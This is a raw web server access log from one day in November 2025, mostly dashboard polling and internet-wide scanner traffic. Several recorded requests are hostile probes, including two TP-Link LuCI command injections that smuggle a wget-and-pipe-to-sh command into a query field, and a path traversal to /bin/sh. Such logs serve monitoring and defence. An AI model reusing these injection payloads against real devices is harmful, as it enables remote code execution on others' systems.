44.201.177.43 - - [08/Nov/2025:08:52:15 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
103.105.208.136 - - [08/Nov/2025:08:59:20 +0300] "GET /robots.txt HTTP/1.1" 404 298 "-" "Mozilla/5.0"
142.93.217.43 - - [08/Nov/2025:09:19:15 +0300] "GET /.env HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
3.145.49.236 - - [08/Nov/2025:09:22:37 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:09:22:38 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:09:37:09 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:09:37:10 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:09:45:37 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:09:45:37 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:09:50:23 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:09:50:23 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
43.163.206.70 - - [08/Nov/2025:09:54:48 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.163.206.70 - - [08/Nov/2025:09:54:49 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
3.146.107.169 - - [08/Nov/2025:09:59:38 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:09:59:38 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
213.209.157.254 - - [08/Nov/2025:09:59:40 +0300] "GET /.git/refs/ HTTP/1.1" 404 299
3.145.49.236 - - [08/Nov/2025:10:02:02 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:10:02:03 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:10:14:48 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:10:14:48 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:10:20:27 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:10:20:27 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:10:27:53 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:10:27:53 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
52.180.136.250 - - [08/Nov/2025:10:29:08 +0300] "GET /actuator/health HTTP/1.1" 404 299
3.145.49.236 - - [08/Nov/2025:10:39:08 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:10:39:08 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
20.121.46.26 - - [08/Nov/2025:10:42:29 +0300] "GET /version HTTP/1.1" 404 299
3.146.107.169 - - [08/Nov/2025:10:43:42 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:10:43:42 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:10:46:30 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:10:46:30 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
204.76.203.219 - - [08/Nov/2025:10:47:40 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
3.145.49.236 - - [08/Nov/2025:10:47:44 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:10:47:45 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:10:57:43 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:10:57:43 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
185.242.226.107 - - [08/Nov/2025:11:03:23 +0300] "GET / HTTP/1.1" 302 -
185.242.226.107 - - [08/Nov/2025:11:03:23 +0300] "GET /dashboard/ HTTP/1.1" 200 5187
3.145.49.236 - - [08/Nov/2025:11:04:55 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:11:04:56 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:11:11:47 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:11:11:47 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:11:18:45 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:11:18:46 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:11:27:24 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:11:27:24 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
209.38.201.154 - - [08/Nov/2025:11:30:10 +0300] "" 400 325 "-" "-"
159.65.164.238 - - [08/Nov/2025:11:33:19 +0300] "GET /.git/config HTTP/1.1" 404 298 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
159.65.164.238 - - [08/Nov/2025:11:33:36 +0300] "GET /.git/config HTTP/1.1" 404 299
93.174.93.12 - - [08/Nov/2025:11:34:10 +0300] "GET / HTTP/1.0" 302 119 "-" "MOTORIZR-Z8/46.00.00 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 356) Opera 8.65 [it] UP.Link/6.3.0.0.0"
185.242.226.107 - - [08/Nov/2025:11:34:25 +0300] "GET /dashboard/images/favicon.png HTTP/1.1" 200 2508
185.242.226.107 - - [08/Nov/2025:11:34:26 +0300] "GET / HTTP/1.1" 302 -
185.242.226.107 - - [08/Nov/2025:11:34:26 +0300] "GET /dashboard/ HTTP/1.1" 200 5187
204.76.203.212 - - [08/Nov/2025:11:34:41 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
209.38.201.154 - - [08/Nov/2025:11:40:47 +0300] "GET /robots.txt HTTP/1.1" 404 298 "-" "Mozilla/5.0"
209.38.201.154 - - [08/Nov/2025:11:40:48 +0300] "GET /robots.txt HTTP/1.1" 404 299
44.201.177.43 - - [08/Nov/2025:11:41:38 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:11:41:39 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:11:47:31 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:11:47:31 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:11:49:49 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:11:49:50 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
66.132.153.117 - - [08/Nov/2025:11:50:23 +0300] "GET / HTTP/1.1" 302 -
66.132.153.117 - - [08/Nov/2025:11:50:24 +0300] "GET /dashboard/ HTTP/1.1" 200 5187
66.132.153.117 - - [08/Nov/2025:11:50:24 +0300] "GET /dashboard/images/favicon.png HTTP/1.1" 200 2508
66.132.153.117 - - [08/Nov/2025:11:50:24 +0300] "GET /favicon.ico HTTP/1.1" 200 30894
66.132.153.117 - - [08/Nov/2025:11:50:34 +0300] "GET / HTTP/1.1" 302 -
66.132.153.117 - - [08/Nov/2025:11:50:40 +0300] "GET /.well-known/security.txt HTTP/1.1" 404 299
68.183.68.61 - - [08/Nov/2025:11:57:48 +0300] "GET /+CSCOL+/Java.jar HTTP/1.1" 404 299
68.183.68.61 - - [08/Nov/2025:11:57:48 +0300] "GET /+CSCOE+/logon_forms.js HTTP/1.1" 404 299
68.183.68.61 - - [08/Nov/2025:11:57:48 +0300] "GET /+CSCOL+/a1.jar HTTP/1.1" 404 299
68.183.68.61 - - [08/Nov/2025:11:57:49 +0300] "GET /+CSCOE+/transfer.js HTTP/1.1" 404 299
167.94.138.52 - - [08/Nov/2025:12:00:20 +0300] "\x16\x03\x01" 400 325 "-" "-"
167.94.138.52 - - [08/Nov/2025:12:00:21 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.52 - - [08/Nov/2025:12:00:23 +0300] "PRI * HTTP/2.0" 400 325 "-" "-"
167.94.138.52 - - [08/Nov/2025:12:00:25 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.52 - - [08/Nov/2025:12:00:27 +0300] "GET /dashboard/images/favicon.png HTTP/1.1" 200 2508 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.52 - - [08/Nov/2025:12:00:28 +0300] "GET /favicon.ico HTTP/1.1" 200 30894 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.52 - - [08/Nov/2025:12:00:40 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
103.203.57.3 - - [08/Nov/2025:12:00:46 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 zgrab/0.x"
167.94.138.52 - - [08/Nov/2025:12:00:50 +0300] "\x16\x03\x01" 400 325 "-" "-"
167.94.138.52 - - [08/Nov/2025:12:00:52 +0300] "GET /login HTTP/1.1" 404 298 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
3.146.107.169 - - [08/Nov/2025:12:01:51 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:12:01:51 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:12:10:44 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:12:10:44 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
103.252.89.75 - - [08/Nov/2025:12:20:08 +0300] "GET / HTTP/1.1" 302 - "-" "-"
3.146.107.169 - - [08/Nov/2025:12:21:52 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:12:21:52 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
43.130.34.74 - - [08/Nov/2025:12:22:01 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.130.34.74 - - [08/Nov/2025:12:22:02 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91-132-49-59.cprapid.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
3.145.49.236 - - [08/Nov/2025:12:24:10 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:12:24:11 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
185.12.59.118 - - [08/Nov/2025:12:26:40 +0300] "GET / HTTP/1.1" 302 -
185.12.59.118 - - [08/Nov/2025:12:26:40 +0300] "GET /dashboard/ HTTP/1.1" 200 5187
103.252.89.75 - - [08/Nov/2025:12:30:49 +0300] "GET / HTTP/1.1" 302 - "-" "-"
44.201.177.43 - - [08/Nov/2025:12:32:44 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
44.201.177.43 - - [08/Nov/2025:12:32:44 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:12:40:52 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:12:40:53 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
43.167.232.38 - - [08/Nov/2025:12:45:02 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.167.232.38 - - [08/Nov/2025:12:45:03 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91-132-49-059.cprapid.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
204.76.203.219 - - [08/Nov/2025:12:49:08 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
34.247.51.117 - - [08/Nov/2025:12:52:28 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
34.247.51.117 - - [08/Nov/2025:12:52:29 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:12:58:20 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:12:58:21 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
85.215.123.196 - - [08/Nov/2025:13:06:11 +0300] "GET /admin/config.php HTTP/1.0" 404 298 "-" "xfa1"
45.135.193.162 - - [08/Nov/2025:13:06:19 +0300] "GET http://ip-api.com/json/ HTTP/1.1" 404 296 "-" "Go-http-client/1.1"
62.169.30.38 - - [08/Nov/2025:13:09:16 +0300] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 329
51.158.54.10 - - [08/Nov/2025:13:12:23 +0300] "GET / HTTP/1.0" 400 468
176.65.149.253 - - [08/Nov/2025:13:16:25 +0300] "GET /.env HTTP/1.0" 404 299
205.210.31.199 - - [08/Nov/2025:13:16:37 +0300] "\x16\x03\x01" 400 325 "-" "-"
205.210.31.199 - - [08/Nov/2025:13:16:37 +0300] "\x16\x03\x01" 400 325 "-" "-"
193.142.147.209 - - [08/Nov/2025:13:16:59 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 298 "-" "-"
3.145.49.236 - - [08/Nov/2025:13:17:20 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:13:17:20 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
51.158.54.10 - - [08/Nov/2025:13:18:22 +0300] "GET / HTTP/1.0" 302 119 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
43.153.119.119 - - [08/Nov/2025:13:20:08 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.153.119.119 - - [08/Nov/2025:13:20:08 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
3.146.107.169 - - [08/Nov/2025:13:20:57 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:13:20:58 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:13:25:53 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:13:25:53 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
51.158.54.10 - - [08/Nov/2025:13:26:05 +0300] "GET /robots.txt HTTP/1.1" 404 298 "-" "Mozilla/5.0"
51.158.54.10 - - [08/Nov/2025:13:26:05 +0300] "GET /robots.txt HTTP/1.1" 404 299
221.159.119.6 - - [08/Nov/2025:13:35:50 +0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 404 298 "-" "-"
221.159.119.6 - - [08/Nov/2025:13:35:51 +0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 404 298 "-" "-"
3.145.49.236 - - [08/Nov/2025:13:45:29 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:13:45:30 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:13:52:00 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:13:52:00 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
193.142.147.209 - - [08/Nov/2025:13:56:45 +0300] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 299
167.94.138.199 - - [08/Nov/2025:14:02:36 +0300] "GET / HTTP/1.1" 302 -
167.94.138.199 - - [08/Nov/2025:14:02:37 +0300] "GET /dashboard/ HTTP/1.1" 200 5187
167.94.138.199 - - [08/Nov/2025:14:02:37 +0300] "GET /dashboard/images/favicon.png HTTP/1.1" 200 2508
167.94.138.199 - - [08/Nov/2025:14:02:38 +0300] "GET /favicon.ico HTTP/1.1" 200 30894
167.94.138.199 - - [08/Nov/2025:14:02:49 +0300] "GET / HTTP/1.1" 302 -
167.94.138.199 - - [08/Nov/2025:14:02:56 +0300] "GET /robots.txt HTTP/1.1" 404 299
35.203.211.86 - - [08/Nov/2025:14:09:44 +0300] "GET / HTTP/1.1" 302 - "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
35.203.211.86 - - [08/Nov/2025:14:09:44 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80/" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
3.145.49.236 - - [08/Nov/2025:14:12:11 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:14:12:12 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:14:24:04 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.146.107.169 - - [08/Nov/2025:14:24:04 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
103.119.94.3 - - [08/Nov/2025:14:34:38 +0300] "GET /robots.txt HTTP/1.1" 404 299
3.145.49.236 - - [08/Nov/2025:14:42:26 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:14:42:27 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
79.124.40.174 - - [08/Nov/2025:14:46:34 +0300] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
79.124.40.174 - - [08/Nov/2025:14:46:34 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80/?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
204.76.203.219 - - [08/Nov/2025:14:49:00 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
3.145.49.236 - - [08/Nov/2025:14:52:28 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:14:52:29 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
204.76.203.212 - - [08/Nov/2025:14:53:18 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
65.49.1.172 - - [08/Nov/2025:14:53:56 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Iron Safari/537.36"
65.49.1.177 - - [08/Nov/2025:14:56:18 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
65.49.1.177 - - [08/Nov/2025:14:56:19 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
65.49.1.181 - - [08/Nov/2025:14:57:02 +0300] "GET /favicon.ico HTTP/1.1" 200 30894 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
65.49.1.172 - - [08/Nov/2025:14:58:03 +0300] "GET /geoserver/web/ HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Iron Safari/537.36"
65.49.1.172 - - [08/Nov/2025:14:58:42 +0300] "GET /info.php HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Iron Safari/537.36"
65.49.1.172 - - [08/Nov/2025:14:58:52 +0300] "GET /phpinfo.php HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
65.49.1.172 - - [08/Nov/2025:14:58:55 +0300] "GET /dashboard/phpinfo.php HTTP/1.1" 200 83941 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0"
64.62.156.172 - - [08/Nov/2025:15:01:45 +0300] "GET / HTTP/1.1" 302 -
64.62.156.174 - - [08/Nov/2025:15:09:32 +0300] "GET /favicon.ico HTTP/1.1" 200 30894
64.62.156.177 - - [08/Nov/2025:15:11:04 +0300] "GET / HTTP/1.1" 302 -
64.62.156.177 - - [08/Nov/2025:15:12:30 +0300] "GET / HTTP/1.1" 302 -
64.62.156.177 - - [08/Nov/2025:15:12:31 +0300] "GET /dashboard/ HTTP/1.1" 200 5187
103.252.89.75 - - [08/Nov/2025:15:19:00 +0300] "GET / HTTP/1.1" 302 - "-" "-"
43.167.157.80 - - [08/Nov/2025:15:19:51 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.167.157.80 - - [08/Nov/2025:15:19:52 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
64.62.156.172 - - [08/Nov/2025:15:19:59 +0300] "GET /vpn/index.html HTTP/1.1" 404 299
64.62.156.179 - - [08/Nov/2025:15:20:17 +0300] "GET /vpn/index.html HTTP/1.1" 404 299
64.62.156.172 - - [08/Nov/2025:15:20:39 +0300] "GET /logon/LogonPoint/index.html HTTP/1.1" 404 299
64.62.156.172 - - [08/Nov/2025:15:20:58 +0300] "GET /logon/LogonPoint/index.html HTTP/1.1" 404 299
64.62.156.172 - - [08/Nov/2025:15:22:10 +0300] "GET /geoserver/web/ HTTP/1.1" 404 299
45.142.193.171 - - [08/Nov/2025:15:22:22 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0"
3.145.49.236 - - [08/Nov/2025:15:22:24 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:15:22:25 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
64.62.156.172 - - [08/Nov/2025:15:26:23 +0300] "GET /.git/config HTTP/1.1" 404 299
159.65.164.238 - - [08/Nov/2025:15:27:47 +0300] "GET /.git/config HTTP/1.1" 404 298 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
159.65.164.238 - - [08/Nov/2025:15:27:55 +0300] "GET /.git/config HTTP/1.1" 404 299
3.145.49.236 - - [08/Nov/2025:15:30:08 +0300] "GET / HTTP/1.1" 302 - "-" "Go-http-client/1.1"
3.145.49.236 - - [08/Nov/2025:15:30:08 +0300] "GET /dashboard/ HTTP/1.1" 200 5187 "http://91.132.49.59:80" "Go-http-client/1.1"
81.12.157.98 - - [08/Nov/2025:15:37:31 +0300] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
159.65.225.55 - - [08/Nov/2025:15:38:55 +0300] "GET /.env HTTP/1.1" 404 299
159.65.225.55 - - [08/Nov/2025:15:38:58 +0300] "GET / HTTP/1.0" 400 468
159.65.225.55 - - [08/Nov/2025:15:38:59 +0300] "GET /.git/config HTTP/1.1" 404 299
159.65.225.55 - - [08/Nov/2025:15:39:00 +0300] "GET / HTTP/1.0" 400 468
